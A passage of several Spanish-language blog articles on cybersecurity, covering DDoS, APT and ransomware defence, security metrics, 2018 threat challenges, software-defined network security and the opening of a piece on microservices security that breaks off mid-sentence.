línea, lo que afecta las capacidades de publicar y acceder a información importante. [Vídeo](https://www.youtube.com/watch?v=bL_YPUejMdw) ### Casos recientes de DDoS Hace solo unos días, se detectó que el notorio botnet Internet of Things (IoT) conocido como Mirai estaba activo en una nueva campaña dirigida a Argentina, sobrealerta después de un aumento del tráfico en puertos 2323 y 23 , extendiendose a otras partes de América del Sur y África del Norte, detectando picos de actividad en una serie de intentos de ataque. Desde el 29 de noviembre a las 2:00 UTC hasta el 29 de noviembre a las 8:00 UTC, se detectaron 371,640 intentos de ataque provenientes de aproximadamente 9,000 direcciones IP únicas. [Imagen: ddos-argentina] [Imagen: ddos-colombia] Como podemos ver en los gráficos, hay distintos intentos de ataque a partir del 22 de noviembre. La segunda ola de intentos de ataque comenzó el 29 de noviembre. Sin embargo, a diferencia de los ataques de Argentina, la segunda ola se distribuyó de forma mucho más pareja, y Colombia fue el que sufrió la mayor parte de los intentos. ### ¿Cómo defenderse de ataques DDoS? Un DDoS puede realizarse de múltiples formas, y al construir una defensa contra ellos, es importante considerar estas variantes. La manera más fácil, aunque costosa de defenderse, es comprar más ancho de banda. Una denegación de servicio es un juego de capacidad. Si tienes 10,000 sistemas que envían 1 Mbps , significa que obtienes 10 Gb golpeando al servidor cada segundo, siendo mucho tráfico. En este caso, se aplican las mismas reglas que para la redundancia normal. Los ataques DDoS modernos se están volviendo increíblemente grandes, y con frecuencia pueden ser mucho más grandes que lo que permitirán absorber los sistemas en términos de ancho de banda. Una de las piezas más importantes de nuestra red es el servidor DNS. Es una mala idea dejarlo abierto para resolver, por lo que debemos bloquearlo para evitar que se use como parte de un ataque. Pero de manera similar, ¿qué pasaría si esos servidores fueran atacados? Incluso si su sitio web está activo, si nadie puede conectarse a sus servidores DNS y resolver el nombre de dominio, es un ataque igual de malo. La mayoría de los registros de dominio se realizan con dos servidores DNS, pero con frecuencia eso puede no ser suficiente. Debemos asegurarnos que el DNS esté protegido por el mismo tipo de equilibrio de carga que la web y otros recursos. Si servimos nuestros propios datos y administrando nuestra red, entonces hay muchas cosas que debemos hacer para protegernos en la capa de red. Asegurarnos de que todos los enrutadores eliminen los paquetes basura, bloquear cosas como ICMP si no lo estamos usando y configurar correctamente los firewalls. Basicamete, debemos bloquea todo lo que podamos en el borde de red, donde tenemos el conducto más grande. ## Ataques de Amenaza Persistente Avanzada (APT) Los ataques de amenaza persistente avanzada (APT) consisten en un ataque de red en el que una persona no autorizada obtiene acceso a una red y permanece allí sin ser detectado durante un período prolongado de tiempo. El objetivo de un ataque avanzado de amenaza persistente es mantener el acceso encubierto y continuo a una red. Esto permite a los piratas informáticos recopilar continuamente credenciales de usuario válidas y acceder a más y más información valiosa. Un ataque de amenaza persistente avanzado tiene como objetivo recopilar información en lugar de cerrar una red, lo que requiere la reescritura continua de códigos y sofisticadas técnicas de evasión. [Vídeo](https://www.youtube.com/watch?v=v02jU53ooaM) ### Estadisticas - De acuerdo con el Poneman Institute, los minoristas infringidos tardaron un promedio de 197 días para identificar una intrusión de APT, mientras que las firmas de servicios financieros tardaron 98 días en detectar los mismos. - En Sony Pictures, Ars Techina informó de que la compañía de entretenimiento perdió el control de más de 100 terabytes de datos sin que la compañía, o sus medidas de seguridad, detectaran la violación. - Las estadísticas de seguridad de Trustwave, a partir de 2015, informaron que el 28% de las organizaciones experimentaron un ataque de amenaza persistente avanzado, y tres cuartas partes no han podido actualizar sus contratos con terceros proveedores para incluir una mejor protección contra las APT. ### ¿Cómo defenderse de un ataque APT? Las empresas que son víctimas de los ataques APT normalmente se basan en el nivel empresarial y son propensas a los riesgos cibernéticos debido a los productos o servicios políticos, culturales, religiosos o ideológicos. Debido al gran impacto y complejidad de los ataques APT, se requieren múltiples tecnologías para combatirlo. Se necesitan conjuntos de seguridad específicos, siendo necesarios informes de incidentes y monitorización las 24 horas del día, el uso extremo a extremo cifrado de datos en reposo es crucial , asi como la segregación de la red, los sistemas de detección de intrusos y las listas blancas de aplicaciones se deben agregar para revertir el daño de los ataques APT. Como medidas preventivas, tener un "sistema de gestión de vulnerabilidades implementado, mantener los parches de seguridad actualizados y probar continuamente el estado de la seguridad de en las infraestructuras de TI. ## Ataques de ramsomware Los ataques de ransomware consisten en un tipo de software malicioso diseñado para bloquear el acceso a un sistema informático hasta que se pague una suma de dinero. El ransomware se está haciendo popular y los piratas informáticos están reconociendo cada vez más los beneficios financieros de emplear tales tácticas. El ataque basado en ransomware ocurre cuando un hacker infecta una pc o servidor, ya sea con un software malicioso cerrando su sistema (locker-ransomware) o mediante el cifrado personalizado de archivos importantes en su sistema y exigiendo un rescate (generalmente en bitcoins) a cambio de sus sistemas / archivos (crypto-ransomware). [Vídeo](https://www.youtube.com/watch?v=s6epDe7lqno) ### Estadisticas -La demanda promedio de rescate se ha incrementado hasta llegar a los 600€, un aumento important respecto de los 280€ de finales de 2015. - El ransomware-as-a-service (RaaS) significa que un mayor número de ciberdelincuentes puede adquirir su propio ransomware, incluidos aquellos con niveles relativamente bajos de experiencia. -En estos últimos años, EE. UU. Fue la región más afectada por el ransomware, con un 28%de las infecciones mundiales. - Los consumidores son las víctimas más probables de un ataque por ransomware, representando el 57 por ciento de todas las infecciones de este último año. ### ¿Cómo prevenir un ataque de ramsonware? Algunas formas de prevenir contra los ataques de ramsonware como CryptoLocker incluyen el uso del conocimiento y la concienciación para evitar los correos electrónicos de phishing y deshabilitar las extensiones de archivos ocultos. La MEJOR forma de defenderse contra el ransomware es hacer una copia de seguridad de nuestros archivos. Aquellos que implementen un cifrado por ransomware no tendrán nada con lo que hacer presión si nuestros archivos están respaldados de manera segura. Muy important o casi clave, no solo para los ataques de ramsonware, mantener actualizados los sistemas. --- # 10 métricas de ciberseguridad que debemos supervisar URL: https://ciberseguridad.blog/10-metricas-de-ciberseguridad-que-debemos-supervisar/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-12-17 Actualizado: 2026-09-29 Tema: Compliance > En economía, lo que no se puede medir no se puede mejorar, y en ciberseguridad, esto no es diferente. Una gestión eficaz de los distintos índices de rendimiento puede significar la diferencia entre un proyecto práctico y eficiente y una pérdida total de dinero. A pesar de que los gerentes y directores de TI han estado siguiendo los KPIs desde hace bastante tiempo, en materia de seguridad de la información, esta es una práctica poco frecuente y en desarrollo más bien reciente para rastrear las mé En economía, lo que no se puede medir no se puede mejorar, y en ciberseguridad, esto no es diferente. Una gestión eficaz de los distintos índices de rendimiento puede significar la diferencia entre un proyecto práctico y eficiente y una pérdida total de dinero. A pesar de que los gerentes y directores de TI han estado siguiendo los KPIs desde hace bastante tiempo, en materia de seguridad de la información, esta es una práctica poco frecuente y en desarrollo más bien reciente para rastrear las métricas de ciberseguridad. Por lo tanto, os dejo algunas sugerencias para métricas de ciberseguridad que pueden y deben seguirse para garantizar la eficiencia de todo proyecto de seguridad. > Cualquier proyecto solo se cumple con métricas bien definidas, monitoreo y evaluaciones continuas. - Peter Drucker ## 1. Número de dispositivos infectados por botnets en un período determinado Saber si los botnets han invadido nuestros entornos, o si se ha intentado una invasión, es una medida importante de ciberseguridad a seguir. Existen muchos actores maliciosos que buscan en Internet puertos abiertos o dispositivos vulnerables, conocer estas redes y los modos de operación pueden mostrarnos los atacante al acecho. El phishing y el drive-by/watering hole son otros métodos comunes de infección. ## 2. Número de sistemas vulnerables con vulnerabilidades conocidas Conocer la cantidad de activos vulnerables en nuestro entorno es una medida clave de ciberseguridad para determinar el riesgo en el que incurre su empresa. Administrar actualizaciones y parches es un proceso complejo, pero muy importante para evitar lagunas que pueden explotarse en el entorno. Un análisis de vulnerabilidad que incluya todos los activos indicará lo que se debe hacer para mejorar la postura de seguridad de la empresa. Un programa de administración de vulnerabilidades no es una exquisitez, sino una necesidad. ## 3. Número de certificados SSL configurados correctamente Un certificado SSL es un pequeño archivo que certifica la propiedad de una clave criptográfica para el sitio web o la empresa con la que se intercambian los datos, lo que garantiza la autenticidad de la transacción. Controlar los requisitos de seguridad para cada certificado, así como garantizar que estén configurados correctamente en los servidores, evita que caigan en las manos equivocadas y que la identidad digital de la empresa no se utiliza para robar información del usuario o similar. ## 4. Volumen de datos transferidos utilizando la red corporativa Si los empleados tienen acceso no restringido a internet a través de la red corporativa, monitorear el volumen de tráfico permite identificar el uso indebido de los recursos de la compañía. Al descargar software, videos, películas y aplicaciones, un usuario puede dejar la puerta abierta a que botnets y malware invadan el entornos, incluso más si las descargas provienen de sitios web conocidos como peligrosos. ## 5. Número de usuarios con nivel de acceso "superusuario". Las mejores prácticas en la administración de la seguridad de la información incluyen un control total del nivel de acceso de los usuarios a los recursos de la compañía, es necesario que un empleado solo tenga acceso a los datos, sistemas y activos que son necesarios para su trabajo. La identificación de los niveles de acceso de todos los usuarios de la red le permite ajustarlos según sea necesario bloqueando cualquier superusuario o administrador que no tenga sentido. ## 6. Número de días para desactivar las credenciales de los empleados. Al monitorear estas métricas de ciberseguridad, puede definir si los equipos de Recursos Humanos y TI están trabajando en sintonía. En un escenario ideal, el acceso de los usuarios finalizados de la empresa debe cancelarse de inmediato. Mantenerlos activos es un riesgo tremendo, ya que podrian filtra información sensible y/o comprometer sistemas críticos. ## 7. Número de puertos de comunicación abiertos durante un período de tiempo. Como regla general, debemos evite permitir el tráfico entrante para NetBIOS (UDP 137 y 138, TCP 135-139 y 445). Cumplir con el protocolo SSL de salida (TCP 443): una sesión que permanece activa durante mucho tiempo podría ser un túnel SSL VPN que permita el tráfico bidireccional. Todos los puertos comunes para los protocolos que permiten sesiones remotas, como TCP 22 (SSH), TCP 23 (telnet), TCP 3389 (RDP) y TCP 20 y 21 (FTP) deben ser supervisados. ## 8. Frecuencia de revisión de accesos de terceros A menudo, los administradores de TI otorgan acceso a terceros en sus redes para completar un proyecto o actividad. Es importante controlar si el acceso se cancela al final del suministro del servicio. De lo contrario, se pone en peligro nuestro entorno si el proveedor decide regresar y extraer datos o llevar a cabo otra actividad maliciosa; por ejemplo, pueden estar bajo el empleo de un competidor. Posiblemente peor, si se infringe la red de proveedores, podríamos exponer nuestra red a la misma amenaza. ## 9. Frecuencia de acceso a sistemas empresariales críticos por parte de terceros. Crear una asignación de sistemas críticos para la empresa y conocer los usuarios que acceden a ellos son imperativos en el contexto de seguridad. La monitorización del Los intentos de accedeso a servidores o aplicaciones que no deben ser dirigidos por usuarios no autorizados pueden indicar una mala conducta e intenciones de comprometer nuestro entorno. ## 10. Porcentaje de socios comerciales con políticas efectivas de ciberseguridad. Debemos mantener un control estricto y monitorizar las métricas de ciberseguridad de las compañías que brindan servicios a nuestro negocio. Dar acceso a sus entornos a esta empresa subcontratada puede ser un gran riesgo si primeramente no se cuenta con políticas efectivas para nuestra seguridad. No es demasiado decir que si nuestra empresa invierte en seguridad pero tenemos terceros conectados a nuestros sistemas que no lo hacen, tenemos nuetra seguridad al descubierto. > Lo que no se puede medir no se puede mejorar. --- # Los 5 retos clave para la ciberseguridad en 2018 URL: https://ciberseguridad.blog/los-5-retos-clave-para-la-ciberseguridad-en-2018/ Tipo: Artículo Autor: Luis Melon Publicado: 2017-12-12 Actualizado: 2026-10-04 Tema: Noticias Seguridad > Hay que establecer una estrategia a seguir, en materia de seguridad, para afrontar las amenazas que surgirán. Pero ¿cuáles serán las amenazas más importantes en el año próximo? Nos acercamos ya al próximo año, y como siempre, por estas fechas, toca analizar los retos para el año próximo. Hay que establecer una estrategia a seguir, en materia de seguridad, para afrontar las amenazas que surgirán. Pero ¿cuáles serán las amenazas más importantes en el año próximo? Como sabemos, las perspectivas de amenaza de seguridad global evolucionan cada año. Por lo tanto, si pensamos que este año ha sido malo en lo referente a las violaciones de seguridad, preparémonos para 2018. El Information Security Forum (IFS) prevé que serán 5 las amenazas clave en 2018 las que provocarán un aumento en las brechas de seguridad. Por ello debemos estar preparados. Toda empresa debería realizar un plan estratégico de seguridad para afrontar estos nuevos retos que se presentan. También estamos viendo que últimamente se está poniendo en entredicho la reputación de grandes compañías y organizaciones, y la gente se pregunta, cómo han podido sufrir o ser víctimas de los ataques producidos. La respuesta es que se está produciendo una mayor sofisticación en los ataques, siendo estos más personalizados o los puntos débiles del objetivo y previendo las defensas que este ha implantado. Por eso, pero no deteriorar más esta reputación, la seguridad debe ir creciendo a la misma velocidad que las amenazas. No hay que dejar de invertir en seguridad ni dar por sentado la total seguridad de un entorno. Los cinco retos más significativos, que explicaremos a continuación, son los siguientes: - IoT (Internet of things) Internet de las cosas. - La cadena de Suministro - CaaS (Crime-as-a-service) Crimen informático como servicio - La regulación, que aumentará la complejidad de la gestión de activos críticos - Las expectativas de la dirección vs. la realidad. ## IoT – Internet de las cosas Cada vez más se están adoptando dispositivos IoT. Esto es una tendencia que va en aumento y no para de crecer. El problema aquí es que, por diseño, la mayoría de estos dispositivos no son seguros. [Imagen: Internet-of-Things-2018] Está claro que no se puede comparar el nivel de seguridad de un ordenador con el de una nevera, termostato, lampara conectado a la red, esto nos devuelve a un estado de seguridad muy anterior al que se ha conseguido en los ordenadores actuales y tengamos en nuestra red dispositivos vulnerables. Otro problema es que el mundo de IoT evoluciona y crece muy rápido, esto provoca que las condiciones y los términos sean imprecisos permitiendo en ocasionas a los proveedores utilizar los datos personales de maneras que no contemplaban los clientes. Desde la perspectiva de las empresas, el mayor riesgo es poder controlar o saber qué información sale de sus redes o que datos están siendo capturados por dispositivos que a priori no son sospechosos, ya que a la hora de securizar, estos dispositivos son muchas veces ignorados. Voy a poner varios ejemplos: - Una impresora conectada en red, si se accede a ella, un atacante tiene acceso a muchos documentos de una empresa que son impresos, y la mayoría de las veces no se sospecha que se han obtenido a través de esa fuente. - Vehículos de empresa, ¿quién no conecta su smartphone a él?, está claro que queremos conducir escuchando nuestra música y hablando por el manos libres. Al conectarse al coche nuestro teléfono nos pide autorizaciones, ¿y qué?, ¿cómo van a hackear el coche? Es algo que ni nos lo solemos plantear. ¿Y si lo está? Pues si lo está nos han grabado las conversaciones y además por el GPS sabrán a dónde hemos ido y nuestras pautas. - Termostatos inteligentes, a lo mejor en una casa no pueden causar mucho daño, pero sube la temperatura en una empresa en su sala de servidores, el daño puede ser muy grande. En definitiva, llevamos años concienciándonos de cómo mantener seguros nuestros ordenadores, porque también llevamos años usándolos y hemos sido testigos de los problemas acarreados al no hacerlos. Ahora debemos hacer lo mismo con todos estos dispositivos y empezar a ver también los potenciales peligros si no se securizan. ## La cadena de suministro [Imagen: El-eslab-n-m-s-d-bil-ciberseguridad] Este es un asunto que viene de años atrás. El problema es que a menudo se comparte una cantidad alta de información valiosa y sensible con los proveedores. Al hacer esto se pierde el control directo sobre los datos. Por lo tanto, esto se traduce en un mayor riesgo de comprometer la confidencialidad, integridad y disponibilidad de esa información. Los retos que afrontamos son: - Saber dónde se encuentra nuestra información en cada etapa del ciclo de vida - Proteger la integridad de esa información mientras se comparte. Para superar estos retos hay que buscar los puntos más débiles de la cadena de suministro. Pero para hacer esto hay que trabajar junto con los proveedores, ambos de manera proactiva, y así, crear procesos fuertes, escalables y repetibles que nos proporcionen garantías. ## CaaS (Crime-as-a-service) El crimen como servicio no es nuevo, se originó hace ya unos años, pero su crecimiento desde entonces ha sido exponencial y es uno de los grandes retos para la ciberseguridad. [Imagen: Caas] Esta amenaza se origina en la Dark Web (web oscura) y proviene de sindicatos criminales, que desarrollan jerarquías complejas, asociaciones y colaboraciones que imitan a las grandes organizaciones del sector privado. Algunas tienen raíces en las estructuras delictivas existentes y otras han surgido centradas exclusivamente en los ciberdelitos Estos grupos ofrecen herramientas avanzadas, a personas con menos conocimiento técnico, con fines delictivos. Esto se traduce en que ya no hace falta un conocimiento alto para lanzar un sofisticado ciberataque o realizar una estafa, multiplicando así el número de posibles atacantes. También en vez de herramientas, ofrecen servicios a la carta, en los que además de ciberdelitos entran delitos tradicionales. Según un estudio realizado este año por Europol, señala al CaaS como un importante proveedor de ciberdelitos, así como de delitos tradicionales, como puede ser la venta ilegal de armas. Ha habido también un cambio en los tipos de empresa que son atacados. Antes los ataques más sofisticados se hacían a grandes empresas, ahora, debido a la cada vez mayor facilidad de realizar estos ataques, los ataques son dirigidos a pequeñas empresas. A esto se junta la imposibilidad de la pequeña empresa a hacer un desembolso importante, equiparable a una gran compañía, en materia de seguridad. Los 5 servicios más populares de CaaS en el campo de los ciberdelitos son: - Phising Kits - Exploit kits - Malware - Ataques de DDoS - Falsos Call Centers de entidades bancarias. ## La Regulación Las regulaciones agregan siempre complejidad en el cumplimiento. Un claro ejemplo es la RGPD, Reglamento General de Protección de Datos de la Unión Europea, que empezará a ser aplicable a partir del 25 de mayo de 2018. A partir de la fecha de cumplimiento obligatorio de la RGPD, cada empresa tiene que garantizar que tiene la capacidad, tanto en su entorno como en la cadena de suministro, de ver cómo se tratan, gestionan y protegen los datos personales en cualquier punto del ciclo de vida. Para poder llevar esto a cabo se van a cambiar muchas configuraciones y en muchos casos la metodología de hacer las cosas. Lo que llevará a cambiar entornos en los que se ha trabajado durante mucho tiempo en securizar y han sido fuertemente testeados por entornos o configuraciones nuevas. El cumplimiento de esta regulación también repercutirá en un aumento de gasto en recursos para esta tarea, los cuales puede que sean desviados de otros proyectos de seguridad. ## Las expectativas de la dirección vs. la realidad Muchas veces hay una falta de entendimiento por parte de la dirección del trabajo que se hace en materia de seguridad y las implicaciones que este tiene. En general saben que la seguridad de la información muchas veces no es tangencial, pero en muchos casos, no entienden todas las implicaciones que tiene eso. En muchos casos piensan que el gerente o responsable de seguridad lo tiene todo bajo control, y no saben las preguntas correctas a realizar para poder entender el grado de seguridad que se tiene. [Imagen: director-seguridad] También en otros casos el gerente o responsable de seguridad no sabe traducir o vender el trabajo hecho al ámbito de negocio para que la dirección lo pueda entender mejor. Por todo lo comentado, muchas veces cuando la dirección aprueba mayores prepuestos en seguridad, creé que esto se traducirá en resultados inmediatos. Pero una compañía totalmente segura es un objetivo inalcanzable. Y aunque se explique esto y llegue a ser entendido por la dirección, lo que le resulta más difícil comprender, es que, llevar a cabo mejoras sustanciales en materia de seguridad de la información lleva tiempo, incluso aunque se cuente con el presupuesto adecuado. Esto se traduce en que muchas veces no se realizan las estrategias adecuadas, ya que se priorizan las fechas, o “logros” que vender a la dirección (que muchas veces no entienden), que seguir una ruta y realizar un plan integral de seguridad. Para que tanto la dirección y el equipo de seguridad trabajen y hablen en la misma línea, el responsable o gerente tiene que actuar como vendedor y consultor a la vez. Tiene que saber traducir las ideas y lenguaje de la seguridad al ámbito del negocio, y no sólo traducir esto, sino venderlo y transmitir su importancia para así obtener el presupuesto necesario para llevarlas a cabo. --- # Seguridad en las redes definidas por Software (SDN) URL: https://ciberseguridad.blog/seguridad-en-las-redes-definidas-por-software-sdn/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-12-06 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > Las ventajas de SDN en varios escenarios ya han sido probadas con exito. Sin embargo y en el foco de mira, la seguridad en SDN definidas por software La red definida por software (SDN) se está moviendo rápidamente de la visión a la realidad con una serie de dispositivos SDN habilitados en desarrollo y producción. La combinación del control separado y la funcionalidad del plano de datos y la programabilidad en la red, que se han debatido durante mucho tiempo, han encontrado su aplicación comercial en la computación en la nube y las tecnologías de virtualización. Las ventajas de SDN en varios escenarios y en varias redes de backbone ya se han sido probadas con exito. Sin embargo, existen grandes desafíos para una implementación de red de operador a gran escala a traves de SDN (Pero ojo, grandes desafios solo), y dentro de estos, un área clave, que apenas comienza a recibir la atención que merece, la seguridad en SDN. La arquitectura SDN se puede aprovechar para mejorar la seguridad de la red con la provisión de un sistema de monitorización, análisis y respuesta de seguridad altamente reactivo. Siendo el controlador central una pieza clave para este sistema. El análisis de tráfico o los métodos de detección de anomalías mediante sondas implementadas en la red, generan datos relacionados con la seguridad, que pueden transferirse regularmente al controlador central. Las aplicaciones se pueden ejecutar en el controlador para analizar y correlacionar estos datos de la red. Con base en el análisis, la política de seguridad nueva o actualizada se puede propagar a través dicho controlador de la red en forma de reglas de flujo. Este enfoque consolidado puede acelerar de manera eficiente el control y la contención de las amenazas a la red y su seguridad. Sin embargo, los mismos atributos de control centralizado y programabilidad asociados con la plataforma SDN presenta desafíos de seguridad de la red. Un mayor potencial para los ataques de Denegación de Servicio (DoS) debido al controlador centralizado y la limitación de la tabla de flujo en los dispositivos de red es un ejemplo perfecto. Otro tema de preocupación basado en la programabilidad abierta de la red es la confianza entre las aplicaciones y los controladores, y entre los controladores y los dispositivos de red. Se han propuesto varias soluciones a estos desafíos de seguridad SDN en muchos textos academicos y de grandes profesionales, donde estos van desde los esquemas de replicación del controlador hasta la resolución de conflictos de políticas y los mecanismos de autenticación. Del mismo modo, se han realizado una serie de propuestas para explotar el Framework SDN para mejorar la seguridad de la red. Hoy trataremos los problemas de seguridad según la capa SDN afectada o dirigida, he intentaremos clasificarlos, ya que sin un aumento significativo del enfoque en la seguridad, SDN no podrá soportar la capacidad de evolución asociada con otras variantes como por ejemplo, Virtualización de Funciones de Red (NFV). ## Seguridad en SDN Las propiedades básicas de una red de comunicaciones segura son: 1. confidencialidad 2. integridad 3. disponibilidad de información 4. autenticación 5. no repudio. Para proporcionar una red protegida contra ataques maliciosos o daños no intencionales, los profesionales de la seguridad debemos proteger los datos, los activos de la red (por ejemplo, los dispositivos) y las transacciones de comunicación a través de la misma. Las modificaciones en la arquitectura de red introducidas por SDN deben evaluarse para garantizar que la seguridad de la red se mantiene. En una iteración temprana de lo que hoy se conoce como SDN, consideraró específicamente los aspectos de seguridad de un Framework separado entre el control y el reenvío. Su arquitectura SANE, propuesta en 2006, se centró en un controlador lógicamente centralizado responsable de la autenticación de los hosts y la aplicación de políticas. En el momento de su propuesta, se consideró que era un enfoque extremo que requeriría un cambio radical en la infraestructura de red y los hosts finales, lo que podría ser demasiado restrictivo para algunas empresas. Ethane extendió el trabajo de SANE pero utilizó un enfoque, que requirió una menor alteración de la red original. Controlaba la red mediante el uso de dos componentes; un controlador centralizado responsable de forzar la política global, y conmutadores etano, que simplemente reenviaban paquetes basados en reglas en una tabla de flujo. Este control simplificado de la red permitió separar los datos y el plano de control para permitir más programabilidad. Aunque la arquitectura de Ethane nos dio una mirada más cercana a lo que lo que SDN y OpenFlow se convertirían, sufrió de una serie de inconvenientes y problemas. Uno de estos es el hecho de que el tráfico de la aplicación podría comprometer la política de la red. En la arquitectura SDN actual, las aplicaciones se utilizan para proporcionar diversos servicios, como, por ejemplo, Virtualización de Funciones de Red (NFV). > El compromiso de las aplicaciones podría afectar a toda la red. Teniendo en cuenta los problemas específicos de seguridad en SDN desde la perspectiva del framework SDN , podemos identificar los desafíos asociados con cada capa del marco: aplicación, control y planos de datos, y en las interfaces entre estas diferentes capas. [Imagen: sdn-seguridad] Recientemente se han realizado una serie de análisis de seguridad, que han encontrado que los elementos alterados o la relación entre elementos en el Framework SDN presentan nuevas vulnerabilidades, que no estaban presentes antes de SDN. Uno de esos documentos completa un análisis del protocolo OpenFlow utilizando la metodología de análisis de amenazas STRIDE. La especificación del interruptor OpenFlow describe el uso de la seguridad en la capa de transporte (TLS) con la autenticación mutua entre los controladores y sus conmutadores. Sin embargo, la función de seguridad es opcional y no se especifica el estándar de TLS. La falta de adopción de TLS por parte de los principales proveedores y la posibilidad de ataques DoS son el foco de una evaluación de vulnerabilidad de OpenFlow y algo a tener muy en cuenta. La falta de uso de TLS podría conducir a la inserción fraudulenta de reglas y modificación de las mismas, con lo que ello conlleva. Debido a la naturaleza del controlador centralizado y la programabilidad de la red, se introducen nuevas amenazas que requieren nuevas respuestas. Proponen una serie de técnicas para abordar las diversas amenazas, incluyendo replicación, diversidad y componentes seguros. Los resultados generales indican el rango de los problemas de seguridad asociados con el Framework SDN son preocupantes si perdemos el foco de la seguridad de los mismo, donde las capas de control y datos se identifican como objetivos claros de posibles ataques. ## Mejoras de la seguridad con SDN La arquitectura de una red definida por software introduce un increible potencial de innovación en el uso de la red. La combinación de la vista global o de toda la red y la programabilidad de la red respalda el proceso de recopilación de inteligencia de los sistemas de detección de intrusiones (IDS) y los sistemas de prevención de intrusiones (IPS) existentes, seguido del análisis y la reprogramación centralizada de la red. Este enfoque puede hacer que la SDN sea más robusta para los ataques maliciosos que las redes tradicionales. > Una SDN con el controlador integrado en los IDS/IPS , es más segura que las redes tradicionales ### El sistema intermedio SDN Las redes tradicionales utilizan sistemas intermedios para proporcionar funciones de seguridad de red. Recientemente, se ha debatido sobre la integración de los "middle-boxes" de seguridad en SDN que explotan el beneficio de la programabilidad para redirigir el tráfico de red seleccionada a través de estos sistemas intermedios. Por ejemplo, la arquitectura Slick propone un controlador centralizado, que se encarga de instalar y migrar funciones en cuadros intermedios personalizados. Las aplicaciones pueden dirigir al controlador Slick para que instale las funciones necesarias para enrutar flujos particulares en función de los requisitos de seguridad. La arquitectura FlowTags propone el uso de sistemas intermedios mínimamente modificadas, que interactuen con un controlador SDN a través de una Interfaz de programación de aplicaciones FlowTags (API). Los diagramas de flujo, que consisten en información de flujo de tráfico, están integrados en los encabezados de los paquetes para proporcionar un seguimiento del flujo y permitir el enrutamiento controlado de los paquetes etiquetados. Una clara desventaja de esta arquitectura es el hecho de que funciona solo con políticas predefinidas y actualmente no maneja acciones dinámicas. La capa SIMPLE de aplicación de políticas es un enfoque para usar SDN para administrar despliegues de middlebox, que a diferencia de las anteriores, no requiere modificaciones de las capacidades SDN o la funcionalidad del cuadro central, lo que la hace las mas adecuada para los sistemas legacy antíguos. Con base en estas propuestas, parecería que un enfoque simple para la provisión de seguridad de la red sería introducir un elemento/sistema intermedio apropiado y programar la red para dirigir el tráfico seleccionado a través del cuadro central. Sin embargo, no es tan simple como esto. La ubicación e integración apropiadas de los sistemas intermedios SDN debe determinarse teniendo en cuenta la penalización del rendimiento que puede tolerarse cuando el tráfico se desvía a través de un enlace o elemento adicional (Añadimos resistencia y latencia cada vez que metemos un nuevo elemento), estas cuestiones y preguntas aún no han sido resueltas, pero debemos plantearnoslas desde un inicio. > Debemos saber lo que queremos, pero tambien cómo lo queremos Sin embargo, el rango de ataques que representan una amenaza para la red es bastante amplio, y más allá de los sistemas intermedios, debemos buscar una serie de soluciones que exploten específicamente el marco SDN para proporcionar soluciones de seguridad a nuestra red. ## Definiendo la seguridad en SDN Los atacantes usan varias técnicas de escaneo para descubrir objetivos vulnerables en la red. Una defensa presentada para frustrar estos ataques es el uso de direcciones Virtuales del Protocolo de Internet (IP) al azar usando SDN. Esta técnica utiliza el controlador OpenFlow para administrar un conjunto de direcciones IP virtuales, que se asignan a los hosts dentro de la red, ocultando las direcciones IP reales del mundo exterior. Esto presenta una defensa móvil en movimiento, que es una forma de ciberseguridad adaptativa. Los sistemas de monitorización son esenciales para proteger la red de posibles ataques. Una forma específica de sistema de monitoreo, el IDS, ha sido el foco de varias soluciones de SDN. Skowyra proponen un aprendizaje IDS, que utiliza la arquitectura SDN para detectar y responder a ataques de red en dispositivos móviles integrados. Un esquema NIDS acelerado por hardware (IDS de red) o NIPS (IPS de red), permitiendo al administrador de red configurar patrones de cadena para su uso por un módulo de inspección profunda de paquetes (DPI). La posibilidad de mejorar y simplificar la seguridad de la red SDN es evidente y por ello veremos y vemos proximamente multitud de productos comerciales con una gama de productos de seguridad SDN en diversas etapas de desarrollo. ## Conclusiones de seguridad con SDN Hay dos escuelas o movimientos de pensamiento sobre seguridad en las redes definidas por software. La primera es que se pueden lograr mejoras significativas en la seguridad de la red explotando simultáneamente la programabilidad y la vista de red centralizada introducida por SDN. El segundo es que estos mismos dos atributos SDN exponen la red a un rango de nuevos ataques. Hemos categorizado los desafíos de seguridad de SDN. El análisis identifica que, independientemente de nuestra escuela de pensamiento, aún queda mucho por hacer; mucho potencial sin explotar y muchos desafíos sin resolver. Un esfuerzo concertado en ambas direcciones podría generar una Red Definida por Software verdaderamente segura y confiable. --- # Seguridad en el mundo de los microservicios URL: https://ciberseguridad.blog/la-seguridad-en-los-microservicios/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-11-24 Actualizado: 2026-10-04 Tema: DevOps > Aplica la mejor seguridad en los microservicios. El objetivo es tener una pequeña pieza de software que realice tareas bien definidas, pero de forma segura. En el mundo de los microservicios, el objetivo es tener una pequeña pieza de software que realice un conjunto de tareas bien definida. Los microservicios son aplicaciones de software que son autónomas. Son pequeños servicios modulares de despliegue independiente que ejecutan un proceso único y se comunican a través de un mecanismo ligero y bien definido para cumplir un objetivo específico. Normalmente, se establecen límites claros con respecto a lo que su microservicio puede o no puede hacer. El paso a los microservicios requiere no solo un cambio en la arquitectura, sino también una base sólida de confianza entre los diferentes equipos que trabajan juntos para desarrollar estos microservicios. La construcción de esta confianza les da la confianza que necesitan para confiar en la disponibilidad de los servicios y el cumplimiento del contrato de servicio acordado para las API estándar. Sin un alto nivel de confianza entre los equipos de desarrolladores , el caos se producirá rápidamente en la organización de desarrollo. Cada equipo creará lo que quiera y/o cambiará las API sin notificar al resto de la organización. En este estado de confusión, la funcionalidad se romperá y el desarrollo de software se detendrá. Si bien la confianza es extremadamente importante en el desarrollo de microservicios, la planificación anticipada ante posibles problemas de seguridad es aún más crítica. Desafortunadamente, las consideraciones de seguridad a menudo se pasan por alto en el proceso de transición a microservicios sin tener en cuenta que las consecuencias de los fallos de seguridad pueden ser devastadores para la empresa. Por ejemplo, supongamos que se está implementando un microservicio que acepta la entrada de un usuario y pasa esa entrada a una base de datos back-end. Si su servicio no es seguro y la entrada no está validada, los piratas informáticos podrán inyectar código malicioso en el sistema y reducir parte del servicio, o tal vez incluso peor, comprometer todo el sistema. [Imagen: Seguridad en los Microservicios] ## Una plétora de microservicios A medida que el repertorio de servicios y aplicaciones crece, probablemente sea más seguro suponer que la cantidad de microservicios disponibles también crecerá. A medida que aumente la cantidad de opciones, seguramente surgirán más y más problemas de seguridad. Hoy, veremos algunos de los problemas y 